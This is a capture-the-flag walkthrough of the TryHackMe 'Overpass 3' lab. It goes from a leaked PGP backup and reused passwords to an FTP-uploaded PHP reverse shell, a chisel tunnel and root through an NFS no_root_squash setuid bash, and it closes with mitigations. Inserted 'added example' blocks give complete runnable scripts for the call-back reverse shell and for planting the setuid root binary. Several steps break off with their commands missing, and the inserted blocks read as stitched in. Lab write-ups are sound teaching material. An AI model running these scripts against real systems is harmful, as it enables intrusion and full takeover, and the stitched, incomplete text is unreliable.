- Link: https://tryhackme.com/room/overpass3hosting
- Difficulty: Medium
- Target: web, user, root flags
- Highlight: port forwarding with chisel
This is the third and final installment of the Overpass challenges on TryHackMe. Here are the other two overpass walkthroughs, just in case you missed them:
In today’s challenge, the team of comp-sci students is at it again with a new website hosting company. However, they haven’t learned much yet about security.
We’ll hack into their new site and escalate our privileges to the root user, and show them that they need to make some security upgrades.
First, we'll note down our IPs in export format to use as bash variables.
export targetIP=10.10.232.238
export myIP=10.6.2.23
Let's also start a regular nmap scan of all ports, and a dirb scan to sniff out web app directories.
The dirb scan finds a /backups directory, and dirb warns that it is listable, so its contents (here, backups.zip) can be read straight from the browser:
─[kalisurfer@parrot]─[~]
└──╼ $dirb http://10.10.232.238
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jan 5 11:16:14 2023
URL_BASE: http://10.10.232.238/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.232.238/ ----
==> DIRECTORY: http://10.10.232.238/backups/
+ http://10.10.232.238/cgi-bin/ (CODE:403|SIZE:217)
+ http://10.10.232.238/index.html (CODE:200|SIZE:1770)
---- Entering directory: http://10.10.232.238/backups/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Thu Jan 5 11:23:15 2023
DOWNLOADED: 4612 - FOUND: 2
After unzipping the backups.zip file, we have two files: priv.key and CustomerDetails.xlsx.pgp. A private PGP key left in a publicly listable backup directory is the first real finding on this box.
Let's move ahead and import the priv.key file with GnuPG, then use it to decrypt the spreadsheet (--output names the decrypted file; without it gpg writes to stdout):
gpg --import priv.key
gpg --output CustomerDetails.xlsx --decrypt CustomerDetails.xlsx.pgp
And now there is a third file, CustomerDetails.xlsx. This file is a spreadsheet with customer data including usernames, passwords and credit card numbers! Let's record the passwords in our notes.txt file for later reference.
username:password
paradox:ShibesAreGreat123
0day:OllieIsTheBestDog
muirlandoracle:A11D0gsAreAw3s0me
The nmap scan shows a few ports open: an FTP service on port 21, SSH on 22 and HTTP on 80.
The FTP server may allow anonymous login. We’ll test that out soon. First, we’ll drill in a bit more on the open ports with a second
WALKING THE WEBSITE
There's not much of use on the website running on port 80. Nothing stands out in the text on the site except the potential usernames and hobbies:
Paradox - Our lead web designer, Paradox can help you create your dream website from the ground up
Elf - Overpass' newest intern, Elf. Elf helps maintain the webservers day to day to keep your site running smoothly and quickly.
MuirlandOracle - HTTPS and networking specialist. Muir's many years of experience and enthusiasm for networking keeps Overpass running, and your sites, online all of the time.
NinjaJc01 - James started Overpass, and keeps the business side running. If you have pricing questions or want to discuss how Overpass can help your business, reach out to him!
A quick look through the page source and the browser's developer tools doesn't reveal anything more here.
CONNECTING WITH FTP
We test out connecting to the FTP service as user paradox, using the password ShibesAreGreat123 from the spreadsheet:
lftp -u paradox $targetIP
We are connected and can see a bunch of files and a directory for backups.
Now that we are connected to the web hosting service, we can upload a payload to spawn a reverse shell and give us an initial foothold into the box. The files we can see over FTP are the site's own, so the FTP account writes straight into the web root: anything we upload will be served, and for PHP executed, by the web server.
CRAFTING A REVERSE SHELL PAYLOAD
We'll use the pentestmonkey PHP reverse shell from revshells.com. This is a good choice because the web server executes a PHP file as soon as it is requested, so loading the page in a browser is enough to trigger it. I've also used this payload successfully before on another box.
Let's go ahead and copy the PHP reverse shell, set our IP and listening port in the file, and save the revshell as rev.php. I'll use port 8888.
UPLOADING THE PAYLOAD WITH FTP
Let's use the terminal window still connected to the FTP service to upload the rev.php file with the command:
And now, the file is in position and ready to use.
SPINNING UP A NETCAT LISTENER TO CATCH A REVSHELL
nc -lvnp 8888
Next we’ll navigate in our browser to
At this point, our netcat listener catches the revshell and we now have an initial foothold as user apache!!
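The payload, upload and listener steps above, wrapped into one script. This is an added example and not the walkthrough's own code: it writes a short proc_open-based PHP reverse shell instead of the pentestmonkey script, pushes it with lftp and then requests it over HTTP. Assumptions not stated on the page: the FTP root is the web root, so the uploaded rev.php is reachable at http://$TARGET/rev.php, and the credentials are the paradox pair from the spreadsheet.

```shell
#!/usr/bin/env bash
# Added example (not from the original walkthrough). Assumes the FTP directory
# is the web root and that lftp, nc and curl are installed on the attack box.
set -eu

# Write a PHP reverse shell that connects back to lhost:lport and attaches an
# interactive /bin/sh to the socket. proc_open accepts stream resources as the
# child's stdin/stdout/stderr, which works under mod_php as well as the CLI.
make_php_revshell() {
    local lhost="$1" lport="$2" out="$3"
    case "$lport" in
        ''|*[!0-9]*) echo "lport must be numeric" >&2; return 1 ;;
    esac
    cat > "$out" <<EOF
<?php
// Added example payload: connect back to the listener, then hand the socket to
// an interactive shell as its stdin/stdout/stderr.
\$sock = fsockopen("$lhost", $lport);
if (\$sock === false) { exit(1); }
\$proc = proc_open("/bin/sh -i", [0 => \$sock, 1 => \$sock, 2 => \$sock], \$pipes);
if (is_resource(\$proc)) { proc_close(\$proc); }
EOF
}

# Upload one file with the FTP credentials recovered from the spreadsheet.
upload_via_ftp() {
    local user="$1" pass="$2" host="$3" file="$4"
    lftp -u "$user","$pass" -e "put $file; bye" "$host"
}

# Start the listener in the foreground and, a moment later, request the page so
# the web server executes rev.php. The HTTP request blocks while the shell lives.
catch_shell() {
    local target="$1" lport="$2" name="$3"
    ( sleep 2; curl -s "http://$target/$name" >/dev/null ) &
    nc -lvnp "$lport"
}

# Run the whole chain only when explicitly asked: ./revshell.sh run
if [ "${1:-}" = "run" ]; then
    : "${TARGET:?set TARGET to the victim IP}" "${LHOST:?set LHOST to the attack box IP}"
    LPORT="${LPORT:-8888}"
    make_php_revshell "$LHOST" "$LPORT" rev.php
    upload_via_ftp paradox ShibesAreGreat123 "$TARGET" rev.php
    catch_shell "$TARGET" "$LPORT" rev.php
fi
```

Invoke it as `TARGET=$targetIP LHOST=$myIP ./revshell.sh run`; with no argument it only defines the functions. The fsockopen/proc_open pair is preferred over the `exec("/bin/sh -i <&3 >&3 2>&3")` one-liner because under Apache the socket is not guaranteed to land on file descriptor 3.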
Let's search for the web.flag file with the following command:
find / -type f -name web.flag 2>/dev/null
The last part of this command (2>/dev/null) redirects standard error (file descriptor 2) to /dev/null, discarding the "Permission denied" messages from directories the apache user cannot read.
And we’ve found it!
STABILIZE A REVSHELL
We can use a Python one-liner to stabilize the shell enough to be able to switch users.
python3 -c 'import pty;pty.spawn("/bin/bash")'
Now we can do a lateral move over to paradox’s account with the password from the spreadsheet.
RUNNING LINPEAS ON THE TARGET MACHINE
The most interesting finding in the linpeas output is this NFS export:
╔══════════╣ Analyzing NFS Exports Files (limit 70)
-rw-r--r--. 1 root root 54 Nov 18 2020 /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
no_root_squash is an NFS export option that turns off the usual mapping of the client's root user to nobody: whoever mounts the share as root acts as root on the exported files. On a share that is also writable (rw), that is enough to create a root-owned setuid binary, which any local user on the server can then run. Since the share is James' home directory, our attack path is becoming clear: pivot to James' account, then use the export to become root.
After stabilizing the revshell we can try a lateral move and switch users to paradox with the password from the spreadsheet:
su paradox
Password: ShibesAreGreat123
EXPLOITING NFS WITH NO_ROOT_SQUASH
Following up now on the linpeas results, let's investigate this NFS service a bit more. Nothing showed up in the nmap scan, but it did in the linpeas results, so my hunch is that the service is firewalled from the outside.
This isn’t a problem to work around, but we need to determine the port that the service is operating on. With the following command on the target machine we can find the port:
rpcinfo -p | grep nfs
We can see in the output that NFS is running on port 2049. We'll use chisel, a TCP tunnelling tool that carries its traffic over HTTP and secures it with SSH, to reroute the blocked port to our attack machine.
USING CHISEL TO PORT FORWARD
We'll need to grab chisel from the GitHub page. There are a few ways to install it from the repo. I chose to use the one-liner below, which fetches the release binary and installs it. Piping a remote script into bash is fine for a lab box, but on anything you care about read the script first or download the release binary directly:
curl https://i.jpillora.com/chisel! | bash
Once installed, I copied the chisel binary over to the target machine. To get this done, we'll spin up a simple HTTP server using Python, and then curl the file from the target machine.
With chisel on both machines, let's create the SSH-secured tunnel with the following commands, forwarding the NFS service (running on port 2049 but firewalled from the public) back to our attack box.
From the attack box:
chisel server -p 7777 --reverse -v
From victim box:
./chisel client 10.6.2.23:7777 R:2049:127.0.0.1:2049 &
The & at the end of the command instructs bash to run the command as a background job, so we keep our shell.
Now let's check whether NFS has any mountable directories. showmount -e would normally do this, but it talks to rpcbind (port 111) and mountd on the target, and neither is forwarded through our 2049-only tunnel, so it cannot answer here. We don't need it: the /etc/exports line from linpeas already tells us the export is the NFSv4 root (fsid=0), and NFSv4 needs only port 2049. One more detail: the chisel client published the port on our own machine, so the server to mount is 127.0.0.1, not $targetIP. Let's go ahead and mount to the folder /mount (which already exists on my machine):
sudo mount -t nfs -o vers=4 127.0.0.1:/ /mount
user.flag is right there in the /home/james directory! Checking for hidden files and directories with "ls -la" reveals a hidden directory (.ssh). Inside this directory we've found an SSH private key. Let's copy this over to our machine so that we can ssh directly in as James without needing their password. Remember to chmod 600 the copied key, or ssh will refuse to use it.
GAINING ROOT PRIVILEGES WITH A SETUID BASH
Because the export is both writable and exported with no_root_squash, the file system does the work for us: a copy of bash placed in James' home directory by James, then chowned to root and given the setuid bit by root on the attack box through the mount, becomes a root-owned setuid binary on the target. We copy bash on the target rather than uploading our own so that it links against the target's own libc. Let's first copy /bin/bash into James' home:
On target box:
cp /bin/bash .
Then, from our mounted NFS folder on the attack box, make it root-owned and add the execute and setuid bits. Both commands run as root on our side, and no_root_squash keeps that root ownership on the server:
sudo chown root:root bash
sudo chmod +xs bash
Last, but not least, let's run it from the target box with bash's -p (privileged) flag, which keeps the effective UID of root instead of dropping back to james:
And we are now root! Let's grab the root flag.
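The whole no_root_squash chain from the sections above as one helper script. This is an added example, not the walkthrough's own code: it flags dangerous exports in /etc/exports-style text (the check linpeas performed), and on the attack box mounts the share through the chisel tunnel and turns the bash copy into a root-owned setuid binary. Assumptions not stated on the page: the reverse tunnel from "chisel client ... R:2049:127.0.0.1:2049" is already up, so NFS answers on the attacker's 127.0.0.1:2049; the mount point is /mnt/nfs; james has already run cp /bin/bash in his home directory.

```shell
#!/usr/bin/env bash
# Added example (not from the original walkthrough). Attack-box side of the
# no_root_squash chain; assumes the chisel reverse tunnel is already up.
set -eu

# Read /etc/exports text on stdin and print each export that a client may
# write to as unsquashed root (rw together with no_root_squash). Such a share
# lets root on the client create root-owned, setuid files on the server.
# Each client entry is checked on its own: "*(ro,no_root_squash)" is not flagged.
find_unsquashed_exports() {
    awk '
        /^[[:space:]]*(#|$)/ { next }              # skip comments and blank lines
        {
            for (i = 2; i <= NF; i++)
                if ($i ~ /no_root_squash/ && $i ~ /[(,]rw[,)]/) { print $1; break }
        }'
}

# True when the file is owned by root with mode 4755 (-rwsr-xr-x), i.e. what
# plant_suid_bash is meant to leave behind on the share.
is_setuid_root() {
    [ "$(stat -c '%U %A' "$1")" = "root -rwsr-xr-x" ]
}

# Mount the NFSv4 root through the tunnel (fsid=0 makes /home/james the root)
# and give the bash copy root ownership and the setuid bit. Both run as real
# root on the server because of no_root_squash. The bash must be the target's
# own copy, placed there by james, so that it matches the target's libc.
plant_suid_bash() {
    local mnt="${1:-/mnt/nfs}" bin="bash"
    sudo mkdir -p "$mnt"
    mountpoint -q "$mnt" || sudo mount -t nfs -o vers=4 127.0.0.1:/ "$mnt"
    if [ ! -f "$mnt/$bin" ]; then
        echo "run 'cp /bin/bash .' in /home/james on the target first" >&2
        return 1
    fi
    sudo chown root:root "$mnt/$bin"
    sudo chmod 4755 "$mnt/$bin"
    is_setuid_root "$mnt/$bin"
}

# scan:  run on the target (or on a copy of its /etc/exports) to list bad exports
# plant: run on the attack box once the tunnel is up
case "${1:-}" in
    scan)  find_unsquashed_exports < "${2:-/etc/exports}" ;;
    plant) plant_suid_bash "${2:-/mnt/nfs}" ;;
esac
```

After `plant` succeeds, finish on the target as james with `/home/james/bash -p`; the `-p` flag stops bash from resetting the effective UID to the real one, and `id` should then report euid=0(root). With no argument the script only defines its functions.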
RECOMMENDED MITIGATION STEPS
- Change permissions on all parts of the website that are not intended to be seen by the public, and turn off directory listing so that a stray /backups folder is not browsable. This includes the
- Keep private keys and credential exports out of the web root altogether; the backup zip handed us a PGP private key and every customer password in clear text.
- Do not let the FTP account write into the web root, and do not let the web server execute files that were uploaded over FTP.
- Remove no_root_squash from /etc/exports (root_squash is the default), do not export home directories, and restrict exports to specific hosts instead of *.
- Stop reusing passwords across services: paradox's spreadsheet password also worked for FTP and for su on the server.
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.